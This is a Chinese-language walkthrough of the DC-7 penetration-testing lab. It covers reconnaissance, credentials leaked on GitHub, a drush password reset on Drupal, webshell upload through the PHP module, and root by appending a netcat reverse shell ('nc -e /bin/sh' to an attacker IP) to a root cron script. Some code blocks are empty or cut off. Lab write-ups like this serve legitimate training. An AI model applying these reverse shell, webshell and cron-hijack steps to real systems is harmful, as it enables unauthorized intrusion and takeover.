DC-7复现
DC-7复现
描述
DC-7是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
虽然这不是一个过于技术性的挑战,但它并不容易。
虽然这是早期DC版本的逻辑进展(我不会告诉你是哪一个),但涉及一些新概念,但你需要自己弄清楚这些概念。:-)如果您需要诉诸暴力破解或字典攻击,您可能不会成功。
你需要做的,是“跳出框框”思考。
哇 盒子的“外面”。:-)
这个挑战的最终目标是获得根并阅读唯一的标志。
Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。
对于初学者来说,谷歌可以提供很大的帮助,但你总是可以在@DCAU7发推文给我寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
信息收集
确定目标的IP,以及开放的端口
nmap 192.168.71.0/24
访问80端口上的服务
机翻
根据这个提示,说不是技术性的问题,那就有可能是找线索,然后可以发现在脚标处有一个@DC7USER,用谷歌搜索进到了他的GitHub主页,在他的staffdb仓库中的config.php里发现了一个账号和密码,还有数据库的名字
1 |
|
漏洞利用
账号密码泄露利用
直接在网页登录,是失败的
那就换一个思路,我们最开始扫描机器的时候,发现其开启了22端口,那就尝试ssh登录
1 | ssh dc7user@192.168.71.129 |
登录成功
在当前目录下,发现了两个文件夹backups和mbox,其中backups是有两个gpg结尾的文件,经过查阅得知这是一种加密文件的后缀;在mbox里记录着root的定时任务,其项目位于/opt/scripts/backups.sh
查看backups.sh里的内容
因为是一个shell脚本,那就看是否够权限写入,并执行进行反弹shell
ls -l
发现并没有权限
drush修改密码
在backups.sh里,我们看到了drush命令,进行简单的了解后发现可以利用
drush部分命令:
1 | 查看用户信息 |
存在admin用户
admin密码修改成功
成功登录
反弹shell
这个站的cms是Drupal8,它是不支持php代码的,需要添加模块
位置:manage->extend->install new module
可以选者在intsall from a url里面填入下载地址进行安装,也可以下载之后选择Upload a module or theme archive to install导入安装,我因为url导入不成功,就用上传的方式
下载地址:
1 | https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz |
回退到Extend界面进行安装
然后进到content界面直接修改随便一个文件,写入一句话木马
连接成功,利用蚁剑的虚拟终端进行反弹shell
1 | nc -lvvp 1234 //在攻击机上执行 |
提权
之前的提权方式都用不了,就只能换个思路,前面提到想用backups.sh进行反弹shell,发现www-data用户是有写入的权限的,那就同理利用其进行提权
可以直接在蚁剑里找到backups.sh直接加上nc -e /bin/sh 192.168.71.128 1234
也可以利用echo进行写入
1 | echo 'nc -e /bin/sh 192.168.71.128 1234'>>/opt/scripts/backups.sh |
1 | cd ~ |